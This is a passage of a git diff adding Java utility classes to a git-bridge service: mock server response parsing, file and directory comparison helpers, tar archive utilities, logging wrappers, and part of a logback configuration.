(jsonGetDoc.has("createdAt")) { + createdAt = jsonGetDoc.get("createdAt").getAsString(); + } + if (jsonGetDoc.has("email")) { + email = jsonGetDoc.get("email").getAsString(); + } + if (jsonGetDoc.has("name")) { + name = jsonGetDoc.get("name").getAsString(); + } + getDoc.put( + projectName, new GetDocResult(jsonGetDoc.get("error"), versionID, createdAt, email, name)); + } + + private void addGetSavedVersForProject(String projectName, JsonArray jsonGetSavedVers) { + List<SnapshotInfo> savedVers = new ArrayList<>(); + for (JsonElement ver : jsonGetSavedVers) { + savedVers.add(getSnapshotInfo(ver.getAsJsonObject())); + } + getSavedVers.put(projectName, new GetSavedVersResult(savedVers)); + } + + private SnapshotInfo getSnapshotInfo(JsonObject jsonSnapshotInfo) { + return new SnapshotInfo( + jsonSnapshotInfo.get("versionID").getAsInt(), + jsonSnapshotInfo.get("comment").getAsString(), + jsonSnapshotInfo.get("email").getAsString(), + jsonSnapshotInfo.get("name").getAsString(), + jsonSnapshotInfo.get("createdAt").getAsString()); + } + + private void addGetForVersForProject(String projectName, JsonArray jsonGetForVers) { + Map<Integer, GetForVersionResult> forVers = new HashMap<>(); + for (JsonElement forVer : jsonGetForVers) { + JsonObject forVerObj = forVer.getAsJsonObject(); + forVers.put( + forVerObj.get("versionID").getAsInt(), + new GetForVersionResult( + new SnapshotData( + getSrcs(forVerObj.get("srcs").getAsJsonArray()), + getAtts(forVerObj.get("atts").getAsJsonArray())))); + } + getForVers.put(projectName, forVers); + } + + private List<SnapshotFile> getSrcs(JsonArray jsonSrcs) { + List<SnapshotFile> srcs = new ArrayList<>(); + for (JsonElement src : jsonSrcs) { + srcs.add(getSrc(src.getAsJsonObject())); + } + return srcs; + } + + private SnapshotFile getSrc(JsonObject jsonSrc) { + return new SnapshotFile( + jsonSrc.get("content").getAsString(), jsonSrc.get("path").getAsString()); + } + + private List<SnapshotAttachment> getAtts(JsonArray jsonAtts) { + List<SnapshotAttachment> atts = 
new LinkedList<>(); + for (JsonElement att : jsonAtts) { + atts.add(getAtt(att.getAsJsonObject())); + } + return atts; + } + + private SnapshotAttachment getAtt(JsonObject jsonAtt) { + return new SnapshotAttachment( + jsonAtt.get("url").getAsString(), jsonAtt.get("path").getAsString()); + } + + private void addPushForProject(String projectName, String jsonPush) { + SnapshotPushResult p; + if (jsonPush.equals("success")) { + p = new SnapshotPushResultSuccess(); + } else if (jsonPush.equals("outOfDate")) { + p = new SnapshotPushResultOutOfDate(); + } else { + throw new IllegalArgumentException("invalid push"); + } + push.put(projectName, p); + } + + private void addPostbackForProject(String projectName, JsonObject jsonPostback) { + SnapshotPostbackRequest p; + String type = jsonPostback.get("type").getAsString(); + if (type.equals("success")) { + p = new SnapshotPostbackRequestSuccess(jsonPostback.get("versionID").getAsInt()); + } else if (type.equals("outOfDate")) { + p = new SnapshotPostbackRequestOutOfDate(); + } else if (type.equals("invalidFiles")) { + p = new SnapshotPostbackRequestInvalidFiles(jsonPostback.get("errors").getAsJsonArray()); + } else if (type.equals("invalidProject")) { + p = new SnapshotPostbackRequestInvalidProject(jsonPostback.get("errors").getAsJsonArray()); + } else if (type.equals("error")) { + p = new SnapshotPostbackRequestError(); + } else { + throw new IllegalArgumentException("invalid postback type"); + } + postback.put(projectName, p); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java new file mode 100644 index 0000000..380c005 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java @@ -0,0 +1,142 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.util; + +import com.google.common.collect.ImmutableSet; +import java.io.File; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.*; +import java.util.stream.Collectors; +import java.util.stream.Stream; +import org.eclipse.jgit.api.Git; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.eclipse.jgit.api.errors.NoHeadException; +import org.eclipse.jgit.revwalk.RevCommit; +import org.eclipse.jgit.storage.file.FileRepositoryBuilder; + +/* + * Created by Winston on 11/01/15. 
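+ *
+ * Test helpers for deep-comparing directory trees and git working copies.
+ * A sketch (the two paths are illustrative):
+ *
+ * <pre>
+ *   boolean sameHead = FileUtil.currentCommitsAreEqual(repo1, repo2);
+ *   boolean sameTree = FileUtil.gitDirectoriesAreEqual(repo1, repo2);
+ * </pre>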
+ */ +public class FileUtil { + + public static boolean currentCommitsAreEqual(Path dir1, Path dir2) { + try { + RevCommit commit1 = + new Git(new FileRepositoryBuilder().setWorkTree(dir1.toFile().getAbsoluteFile()).build()) + .log() + .call() + .iterator() + .next(); + RevCommit commit2 = + new Git(new FileRepositoryBuilder().setWorkTree(dir2.toFile().getAbsoluteFile()).build()) + .log() + .call() + .iterator() + .next(); + return commit1.equals(commit2); + } catch (IOException e) { + throw new RuntimeException(e); + } catch (NoHeadException e) { + return false; + } catch (GitAPIException e) { + throw new RuntimeException(e); + } + } + + public static boolean gitDirectoriesAreEqual(Path dir1, Path dir2) { + Set<String> dir1Contents = getAllRecursivelyInDirectoryApartFrom(dir1, dir1.resolve(".git")); + Set<String> dir2Contents = getAllRecursivelyInDirectoryApartFrom(dir2, dir2.resolve(".git")); + return filesAreEqual(dir1, dir2, dir1Contents, dir2Contents); + } + + public static boolean directoryDeepEquals(File dir, File dir_) { + return directoryDeepEquals(dir.toPath(), dir_.toPath()); + } + + public static boolean directoryDeepEquals(Path path, Path path_) { + List<Set<String>> contents = + Stream.of(path, path_) + .map(p -> getAllFilesRecursively(p, p, Collections.emptySet(), true)) + .collect(Collectors.toList()); + return filesAreEqual(path, path_, contents.get(0), contents.get(1)); + } + + private static boolean filesAreEqual( + Path dir1, Path dir2, Set<String> dir1Contents, Set<String> dir2Contents) { + boolean filesEqual = dir1Contents.equals(dir2Contents); + if (!filesEqual) { + System.out.println("Not equal: (" + dir1Contents + ", " + dir2Contents + ")"); + System.out.println(dir1 + ": " + dir1Contents); + System.out.println(dir2 + ": " + dir2Contents); + } + return filesEqual && directoryContentsEqual(dir1Contents, dir1, dir2); + } + + static boolean directoryContentsEqual(Set<String> dirContents, Path dir1, Path dir2) { + for (String file : dirContents) { + Path path1 = dir1.resolve(file); + Path path2 = dir2.resolve(file); + if (!path1.toFile().isDirectory() + && !path2.toFile().isDirectory() + && !fileContentsEqual(path1, path2)) { + return false; + } + } + return true; + } + + private static boolean fileContentsEqual(Path first, Path second) { + try { + byte[] firstContents = Files.readAllBytes(first); + byte[] secondContents = Files.readAllBytes(second); + boolean equals = Arrays.equals(firstContents, secondContents); + if (!equals) { + System.out.println("Not equal: (" + first + ", " + second + ")"); + System.out.println(first + ": " + new String(firstContents)); + System.out.println(second + ": " + new String(secondContents)); + } + return equals; + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + public static Set<String> getAllRecursivelyInDirectoryApartFrom(Path dir, Path excluded) { + return getAllRecursivelyInDirectoryApartFrom(dir, excluded, true); + } + + public static Set<String> getOnlyFilesRecursivelyInDirectoryApartFrom(Path dir, Path excluded) { + return getAllRecursivelyInDirectoryApartFrom(dir, excluded, false); + } + + private static Set<String> getAllRecursivelyInDirectoryApartFrom( + Path dir, Path excluded, boolean directories) { + if (!dir.toFile().isDirectory()) { + throw new IllegalArgumentException("need a directory"); + } + return getAllFilesRecursively(dir, dir, ImmutableSet.of(excluded.toFile()), directories); + } + + private static final Set<String> ExcludedNames = ImmutableSet.of(".DS_Store"); + + static Set<String> 
getAllFilesRecursively( + Path baseDir, Path dir, Set<File> excluded, boolean directories) { + Set<String> files = new HashSet<String>(); + for (File file : dir.toFile().listFiles()) { + if (excluded.contains(file)) { + continue; + } + if (ExcludedNames.contains(file.getName())) { + continue; + } + boolean isDirectory = file.isDirectory(); + if (directories || !isDirectory) { + files.add(baseDir.relativize(file.toPath()).toString()); + } + if (isDirectory) { + files.addAll(getAllFilesRecursively(baseDir, file.toPath(), excluded, directories)); + } + } + return files; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java new file mode 100644 index 0000000..f1384ea --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java @@ -0,0 +1,10 @@ +package uk.ac.ic.wlgitbridge.util; + +/* + * BiConsumer interface that allows checked exceptions. + */ +@FunctionalInterface +public interface BiConsumerT<T, U, E extends Throwable> { + + void accept(T t, U u) throws E; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java new file mode 100644 index 0000000..a19218a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.io.*; + +/* + * A {@link java.io.FileInputStream} which deletes the underlying + * {@link java.io.File} on close. + * + * @author Michael Walker (barrucadu) {@literal <mike@barrucadu.co.uk>} + */ +public class DeletingFileInputStream extends FileInputStream { + private File file; + + /* + * Creates a {@link java.io.FileInputStream} by opening a + * connection to an actual file, the file named by the + * {@link java.io.File} object file in the file system. + * + * When the {@link close} method is called, the {@code File} will + * be deleted. + */ + public DeletingFileInputStream(File file) throws FileNotFoundException { + super(file); + this.file = file; + } + + /* + * Closes this input stream and deletes the underlying file. + */ + @Override + public void close() throws IOException { + try { + super.close(); + } finally { + if (file != null) { + file.delete(); + file = null; + } + } + } + + /* + * We shouldn't rely on this for correctness! 
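+ * Finalization timing is not guaranteed (it may never run at all), so
+ * this is only a best-effort safety net; the underlying file should be
+ * deleted by an explicit close(), e.g. via try-with-resources.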
+ */ + @Override + protected void finalize() throws Throwable { + try { + super.finalize(); + } finally { + if (file != null) { + Log.warn("File open at finalization time: {}", file.getCanonicalPath()); + try { + close(); + } catch (IOException e) { + Log.error("Failed to delete file", e); + } + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java new file mode 100644 index 0000000..bd41161 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java @@ -0,0 +1,98 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.io.UncheckedIOException; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.Set; +import java.util.stream.Collectors; +import org.apache.commons.io.FileUtils; +import org.apache.commons.io.filefilter.TrueFileFilter; + +/* + * Created by winston on 23/08/2016. + */ +public class Files { + + private Files() {} + + public static boolean contentsAreEqual(File f0, File f1) throws IOException { + try { + return uncheckedContentsAreEqual(f0, f1); + } catch (UncheckedIOException e) { + throw e.getCause(); + } + } + + public static void renameAll(File fileOrDir, String from, String to) { + if (fileOrDir.isDirectory()) { + File f = doRename(fileOrDir, from, to); + for (File c : f.listFiles()) { + renameAll(c, from, to); + } + } else if (fileOrDir.isFile()) { + doRename(fileOrDir, from, to); + } else { + throw new IllegalArgumentException("not a file or dir: " + fileOrDir); + } + } + + private static File doRename(File fileOrDir, String from, String to) { + if (!fileOrDir.getName().equals(from)) { + return fileOrDir; + } + File renamed = new File(fileOrDir.getParent(), to); + Preconditions.checkState(fileOrDir.renameTo(renamed)); + return renamed; + } + + private static boolean uncheckedContentsAreEqual(File f0, File f1) throws IOException { + if (f0.equals(f1)) { + return true; + } + if (!f0.isDirectory() || !f1.isDirectory()) { + return !f0.isDirectory() + && !f1.isDirectory() + && Arrays.equals(FileUtils.readFileToByteArray(f0), FileUtils.readFileToByteArray(f1)); + } + Path f0Base = Paths.get(f0.getAbsolutePath()); + Path f1Base = Paths.get(f1.getAbsolutePath()); + Set<Path> children0 = getChildren(f0, f0Base); + Set<Path> children1 = getChildren(f1, f1Base); + if (children0.size() != children1.size()) { + return false; + } + return children0.stream() + .allMatch(c0 -> children1.contains(c0) && childEquals(c0, f0Base, f1Base)); + } + + private static Set<Path> getChildren(File f0, Path f0Base) { + return FileUtils.listFilesAndDirs(f0, TrueFileFilter.TRUE, TrueFileFilter.TRUE).stream() + .map(File::getAbsolutePath) + .map(Paths::get) + .map(p -> f0Base.relativize(p)) + .filter(p -> !p.toString().isEmpty()) + .collect(Collectors.toSet()); + } + + private static boolean childEquals(Path child, Path f0Base, Path f1Base) + throws UncheckedIOException { + File c0 = f0Base.resolve(child).toFile(); + File c1 = f1Base.resolve(child).toFile(); + boolean c0IsDir = c0.isDirectory(); + boolean c1IsDir = c1.isDirectory(); + if (c0IsDir || c1IsDir) { + return c0IsDir && c1IsDir; + } + try { + return c0.isFile() + && c1.isFile() + && Arrays.equals(FileUtils.readFileToByteArray(c0), FileUtils.readFileToByteArray(c1)); + } catch (IOException e) { + throw new 
UncheckedIOException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java new file mode 100644 index 0000000..43d58dd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.util; + +/* + * Function interface that allows checked exceptions. + * @param <T> + * @param <R> + * @param <E> + */ +@FunctionalInterface +public interface FunctionT<T, R, E extends Throwable> { + + R apply(T t) throws E; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java new file mode 100644 index 0000000..1b55416 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java @@ -0,0 +1,26 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.http.HttpRequestFactory; +import com.google.api.client.http.HttpTransport; +import com.google.api.client.http.javanet.NetHttpTransport; +import com.google.api.client.json.JsonFactory; +import com.google.api.client.json.gson.GsonFactory; +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; + +/* + * Created by winston on 25/10/15. + */ +public class Instance { + + public static final HttpTransport httpTransport = new NetHttpTransport(); + + public static final HttpRequestFactory httpRequestFactory = httpTransport.createRequestFactory(); + + public static final JsonFactory jsonFactory = new GsonFactory(); + + public static final Gson prettyGson = + new GsonBuilder().setPrettyPrinting().serializeNulls().disableHtmlEscaping().create(); + + public static final Gson gson = new Gson(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java new file mode 100644 index 0000000..92b7d94 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java @@ -0,0 +1,85 @@ +package uk.ac.ic.wlgitbridge.util; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import uk.ac.ic.wlgitbridge.application.GitBridgeApp; + +/* + * Created by winston on 19/01/2016. + */ +public class Log { + + private static Logger logger = LoggerFactory.getLogger(GitBridgeApp.class); + + public static void trace(String msg) { + logger.trace(msg); + } + + public static void trace(String msg, Throwable t) { + logger.trace(msg, t); + } + + public static void debug(String msg) { + logger.debug(msg); + } + + public static void debug(String msg, Throwable t) { + logger.debug(msg, t); + } + + public static void debug(String format, Object... args) { + logger.debug(format, args); + } + + public static void info(String msg) { + logger.info(msg); + } + + public static void info(String format, Object arg) { + logger.info(format, arg); + } + + public static void info(String format, Object arg1, Object arg2) { + logger.info(format, arg1, arg2); + } + + public static void info(String format, Object... args) { + logger.info(format, args); + } + + public static void info(String msg, Throwable t) { + logger.info(msg, t); + } + + public static void warn(String msg) { + logger.warn(msg); + } + + public static void warn(String msg, Object arg) { + logger.warn(msg, arg); + } + + public static void warn(String msg, Object arg1, Object arg2) { + logger.warn(msg, arg1, arg2); + } + + public static void warn(String msg, Object... 
args) { + logger.warn(msg, args); + } + + public static void warn(String msg, Throwable t) { + logger.warn(msg, t); + } + + public static void error(String msg) { + logger.error(msg); + } + + public static void error(String msg, Object... args) { + logger.error(msg, args); + } + + public static void error(String msg, Throwable t) { + logger.error(msg, t); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java new file mode 100644 index 0000000..a6e0fa4 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.common.base.Preconditions; + +/* + * Created by winston on 23/08/2016. + */ +public class Project { + + public static boolean isValidProjectName(String projectName) { + return projectName != null && !projectName.isEmpty() && !projectName.startsWith("."); + } + + public static void checkValidProjectName(String projectName) { + Preconditions.checkArgument( + isValidProjectName(projectName), "[%s] invalid project name", projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java new file mode 100644 index 0000000..6899541 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.io.File; +import java.io.IOException; +import org.apache.commons.io.FileUtils; + +public class ResourceUtil { + + /* + * Creates a copy of a resource folder. Mainly used for testing to prevent + * the original folder from being mangled. + * + * It will have the same name as the original. + * @param resource the resource name, e.g. "/uk/ac/ic/wlgitbridge/file.txt" + * @param folderProvider function used to create the folder. + * E.g. 
TemporaryFolder from junit + * @return + * @throws IOException + */ + public static File copyOfFolderResource( + String resource, FunctionT<String, File, IOException> folderProvider) throws IOException { + File original = new File(ResourceUtil.class.getResource(resource).getFile()); + File tmp = folderProvider.apply(original.getName()); + FileUtils.copyDirectory(original, tmp); + return tmp; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java new file mode 100644 index 0000000..512babf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java @@ -0,0 +1,171 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.*; +import java.nio.file.Path; +import java.nio.file.Paths; +import org.apache.commons.compress.archivers.ArchiveEntry; +import org.apache.commons.compress.archivers.tar.TarArchiveEntry; +import org.apache.commons.compress.archivers.tar.TarArchiveInputStream; +import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; +import org.apache.commons.compress.compressors.bzip2.BZip2CompressorInputStream; +import org.apache.commons.compress.compressors.bzip2.BZip2CompressorOutputStream; +import org.apache.commons.compress.compressors.gzip.GzipCompressorInputStream; +import org.apache.commons.compress.compressors.gzip.GzipCompressorOutputStream; +import org.apache.commons.compress.utils.IOUtils; + +/* + * Tar utilities. + * + * The resource returned by zip and tar are treated as unowned. + * + * The resource given to unzip is treated as unowned. + * + * Caller is responsible for all resources. + */ +public class Tar { + public static class gzip { + + public static InputStream zip(File fileOrDir) throws IOException { + return zip(fileOrDir, null); + } + + public static InputStream zip(File fileOrDir, long[] sizePtr) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar.gz"); + tmp.deleteOnExit(); + OutputStream target = new FileOutputStream(tmp); + /* Closes target */ + try (OutputStream gz = new GzipCompressorOutputStream(target)) { + tarTo(fileOrDir, gz); + } catch (IOException e) { + tmp.delete(); + throw e; + } + if (sizePtr != null) { + sizePtr[0] = tmp.length(); + } + return new DeletingFileInputStream(tmp); + } + + public static void unzip(InputStream targz, File parentDir) throws IOException { + /* GzipCompressorInputStream does not need closing + Closing it would close targz which we should not do */ + InputStream tar = new GzipCompressorInputStream(targz); + untar(tar, parentDir); + } + } + + public static class bz2 { + + public static InputStream zip(File fileOrDir) throws IOException { + return zip(fileOrDir, null); + } + + public static InputStream zip(File fileOrDir, long[] sizePtr) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar.bz2"); + tmp.deleteOnExit(); + OutputStream target = new FileOutputStream(tmp); + /* Closes target */ + try (OutputStream bzip2 = new BZip2CompressorOutputStream(target)) { + tarTo(fileOrDir, bzip2); + } catch (IOException e) { + tmp.delete(); + throw e; + } + if (sizePtr != null) { + sizePtr[0] = tmp.length(); + } + return new DeletingFileInputStream(tmp); + } + + public static void unzip(InputStream tarbz2, File parentDir) throws IOException { + /* BZip2CompressorInputStream does not need closing + Closing it would close tarbz2 which we should not do */ + 
InputStream tar = new BZip2CompressorInputStream(tarbz2); + untar(tar, parentDir); + } + } + + private Tar() {} + + public static InputStream tar(File fileOrDir) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar"); + tmp.deleteOnExit(); + try (FileOutputStream target = new FileOutputStream(tmp)) { + tarTo(fileOrDir, target); + return new DeletingFileInputStream(tmp); + } catch (IOException e) { + tmp.delete(); + throw e; + } + } + + public static void tarTo(File fileOrDir, OutputStream target) throws IOException { + try (TarArchiveOutputStream tout = new TarArchiveOutputStream(target)) { + addTarEntry(tout, Paths.get(fileOrDir.getParentFile().getAbsolutePath()), fileOrDir); + } + } + + public static void untar(InputStream tar, File parentDir) throws IOException { + TarArchiveInputStream tin = new TarArchiveInputStream(tar); + ArchiveEntry e; + while ((e = tin.getNextEntry()) != null) { + File f = new File(parentDir, e.getName()); + f.setLastModified(e.getLastModifiedDate().getTime()); + f.getParentFile().mkdirs(); + if (e.isDirectory()) { + f.mkdir(); + continue; + } + long size = e.getSize(); + checkFileSize(size); + try (OutputStream out = new FileOutputStream(f)) { + /* TarInputStream pretends each + entry's EOF is the stream's EOF */ + IOUtils.copy(tin, out); + } + } + } + + private static void checkFileSize(long size) { + Preconditions.checkArgument( + size >= 0 && size <= Integer.MAX_VALUE, + "file too big (" + size + " B): " + "tarTo should have thrown an IOException"); + } + + private static void addTarEntry(TarArchiveOutputStream tout, Path base, File fileOrDir) + throws IOException { + if (fileOrDir.isDirectory()) { + addTarDir(tout, base, fileOrDir); + } else if (fileOrDir.isFile()) { + addTarFile(tout, base, fileOrDir); + } else { + throw new IllegalArgumentException("invalid file or dir: " + fileOrDir); + } + } + + private static void addTarDir(TarArchiveOutputStream tout, Path base, File dir) + throws IOException { + Preconditions.checkArgument(dir.isDirectory()); + String name = base.relativize(Paths.get(dir.getAbsolutePath())).toString(); + TarArchiveEntry entry = tout.createArchiveEntry(dir, name); + tout.putArchiveEntry(entry); + tout.closeArchiveEntry(); + for (File f : dir.listFiles()) { + addTarEntry(tout, base, f); + } + } + + private static void addTarFile(TarArchiveOutputStream tout, Path base, File file) + throws IOException { + Preconditions.checkArgument(file.isFile(), "given file" + " is not file: %s", file); + checkFileSize(file.length()); + String name = base.relativize(Paths.get(file.getAbsolutePath())).toString(); + TarArchiveEntry entry = tout.createArchiveEntry(file, name); + tout.putArchiveEntry(entry); + try (InputStream in = new FileInputStream(file)) { + IOUtils.copy(in, tout); + } + tout.closeArchiveEntry(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java new file mode 100644 index 0000000..f432f1d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.util.TimerTask; + +/* + * Created by winston on 23/08/2016. 
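+ *
+ * Wraps a Runnable in a TimerTask that logs any uncaught Throwable rather
+ * than letting it kill the Timer thread. Hypothetical usage (the task name
+ * is illustrative, not from this codebase):
+ *
+ *   Timer timer = new Timer();
+ *   timer.schedule(TimerUtils.makeTimerTask(() -> doPeriodicWork()), 0L, 60_000L);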
+ */ +public class TimerUtils { + + public static TimerTask makeTimerTask(Runnable lamb) { + return new TimerTask() { + @Override + public void run() { + try { + lamb.run(); + } catch (Throwable t) { + Log.warn("Error on timer", t); + } + } + }; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java new file mode 100644 index 0000000..57eeb11 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java @@ -0,0 +1,187 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.*; +import java.text.DateFormat; +import java.text.SimpleDateFormat; +import java.util.*; + +/* + * Created by Winston on 19/11/14. + */ +public class Util { + + private static String SERVICE_NAME; + private static String HOSTNAME; + private static int PORT; + private static String POSTBACK_URL; + private static final DateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSSSSS"); + + public static String entries(int entries) { + if (entries == 1) { + return "entry"; + } else { + return "entries"; + } + } + + public static int booleanToInt(boolean b) { + if (b) { + return 1; + } else { + return 0; + } + } + + public static boolean intToBoolean(int i) { + return i != 0; + } + + private static String removeAllSuffix(String str, String suffix) { + int lastIndexOfSuffix; + String result = str; + while ((lastIndexOfSuffix = result.lastIndexOf(suffix)) > -1) { + result = result.substring(0, lastIndexOfSuffix); + } + return result; + } + + /* removeAllSuffixes("something.git///", "/", ".git") => "something" */ + public static String removeAllSuffixes(String str, String... suffixes) { + String result = str; + for (String suffix : suffixes) { + result = removeAllSuffix(result, suffix); + } + return result; + } + + public static String getContentsOfReader(BufferedReader reader) throws IOException { + StringBuilder sb = new StringBuilder(); + for (String line; (line = reader.readLine()) != null; ) { + sb.append(line); + } + return sb.toString(); + } + + public static void setServiceName(String serviceName) { + SERVICE_NAME = serviceName; + } + + public static String getServiceName() { + return SERVICE_NAME; + } + + public static int getPort() { + return PORT; + } + + public static void setPort(int port) { + PORT = port; + } + + public static void setPostbackURL(String postbackURL) { + POSTBACK_URL = postbackURL; + } + + public static String getPostbackURL() { + return POSTBACK_URL; + } + + public static void deleteDirectory(File directory) { + if (directory != null) { + deleteInDirectory(directory); + directory.delete(); + } + } + + public static void deleteInDirectory(File directory) { + if (directory != null) { + deleteInDirectoryApartFrom(directory); + } + } + + public static void deleteInDirectoryApartFrom(File directory, String... 
apartFrom) { + if (directory != null) { + Set<String> excluded = new HashSet<>(Arrays.asList(apartFrom)); + File[] files = directory.listFiles(); + if (files != null) { + for (File file : files) { + if (!excluded.contains(file.getName())) { + if (file.isDirectory()) { + deleteInDirectory(file); + } + file.delete(); + Log.debug("Deleted file: {}", file.getAbsolutePath()); + } + } + } + } + } + + public static List<String> linesFromStream(InputStream stream, int skip, String trimSuffix) + throws IOException { + List<String> lines = new ArrayList<>(); + BufferedReader reader = new BufferedReader(new InputStreamReader(stream)); + String line; + for (int i = 0; i < skip; i++) { + reader.readLine(); + } + while ((line = reader.readLine()) != null) { + String trim = line.trim(); + trim = trim.replaceAll("\\p{C}", ""); + int endIndex = trim.lastIndexOf(trimSuffix); + if (endIndex >= 0) { + trim = trim.substring(0, endIndex); + } + lines.add(trim); + } + return lines; + } + + public static String fromStream(InputStream stream, int skip) throws IOException { + BufferedReader reader = new BufferedReader(new InputStreamReader(stream)); + StringBuilder out = new StringBuilder(); + String newLine = System.getProperty("line.separator"); + String line; + for (int i = 0; i < skip; i++) { + reader.readLine(); + } + while ((line = reader.readLine()) != null) { + out.append(line); + out.append(newLine); + } + return out.toString(); + } + + public static String fromStream(InputStream stream) throws IOException { + return fromStream(stream, 0); + } + + public static String getCodeFromResponse(JsonObject json) { + String code = "error"; + JsonElement codeElement = json.get("code"); + + if (codeElement == null) { + String error = "Unexpected error"; + Log.warn("Unexpected response from API:"); + Log.warn(json.toString()); + Log.warn("End of response"); + JsonElement statusElement = json.get("status"); + if (statusElement != null) { + String status = statusElement.getAsString(); + if (status.equals("422")) { + error = "Unprocessable entity"; + } else if (status.equals("404")) { + error = "Not found"; + } else if (status.equals("403")) { + error = "Forbidden"; + } + } + throw new RuntimeException(error); + } else { + code = codeElement.getAsString(); + } + return code; + } +} diff --git a/services/git-bridge/src/main/resources/logback.xml b/services/git-bridge/src/main/resources/logback.xml new file mode 100644 index 0000000..343ae57 --- /dev/null +++ b/services/git-bridge/src/main/resources/logback.xml @@ -0,0 +1,35 @@ +<configuration> + + <variable name="LOG_LEVEL" value="${LOG_LEVEL:-INFO}" /> + + <!-- Log everything (subject to logger and root levels set below) to stdout. --> + <appender name="stdout" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.out</target> + <filter class="ch.qos.logback.classic.filter.ThresholdFilter"> + <level>${LOG_LEVEL}</level> + </filter> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Log warnings and errors to stderr. We send them to a log aggregation service for monitoring. --> + <appender name="stderr" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.err</target> + <filter class="ch.qos.logback.classic.filter.ThresholdFilter"> + <level>WARN</level> + </filter> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Set log levels for the application (or parts of the application). 
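+       The level comes from the LOG_LEVEL variable declared at the top of
+       this file, which defaults to INFO unless overridden externally.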
